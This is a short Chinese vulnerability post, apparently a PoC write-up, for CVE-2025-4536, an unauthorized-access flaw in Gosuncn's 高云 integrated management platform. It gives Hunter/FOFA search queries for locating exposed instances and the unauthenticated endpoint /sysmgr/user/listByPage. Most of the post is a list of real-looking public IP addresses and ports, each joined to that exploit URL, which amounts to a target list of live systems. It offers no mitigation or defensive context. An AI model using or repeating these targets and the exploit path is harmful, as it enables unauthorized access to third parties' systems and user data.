(CVE-2025-4536)【原创】高新兴科技集团股份有限公司高云综合管理平台 V1.0 未授权访问漏洞
当前为私密分享,无需登录即可查看。
| 时间 |
|---|
| 2025-04-26 11:56:09 |
需申请CVE
厂商信息
高新兴科技集团股份有限公司
搜索语法
Hunter
web.title="高云·综合管理平台"
FOFA
漏洞复现
Poc:
[/sysmgr/user/listByPage
Url+拼接poc直接访问
1、http://124.133.236.211:9998/web/uap-ui/#/login
http://124.133.236.211:9998/sysmgr/user/listByPage
2、http://223.85.250.189:10013/web/uap-ui/#/login
http://223.85.250.189:10013/sysmgr/user/listByPage
3、http://60.255.185.166:10013/web/uap-ui/#/login
http://60.255.185.166:10013/sysmgr/user/listByPage
http://124.133.236.211:9998/sysmgr/user/listByPage
http://223.111.251.20:9998/sysmgr/user/listByPage
http://140.206.131.46:9998/sysmgr/user/listByPage
http://140.206.131.45:9998/sysmgr/user/listByPage
http://36.134.77.52:9998/sysmgr/user/listByPage
http://39.173.10.197:9998/sysmgr/user/listByPage
http://122.141.234.9:10013/sysmgr/user/listByPage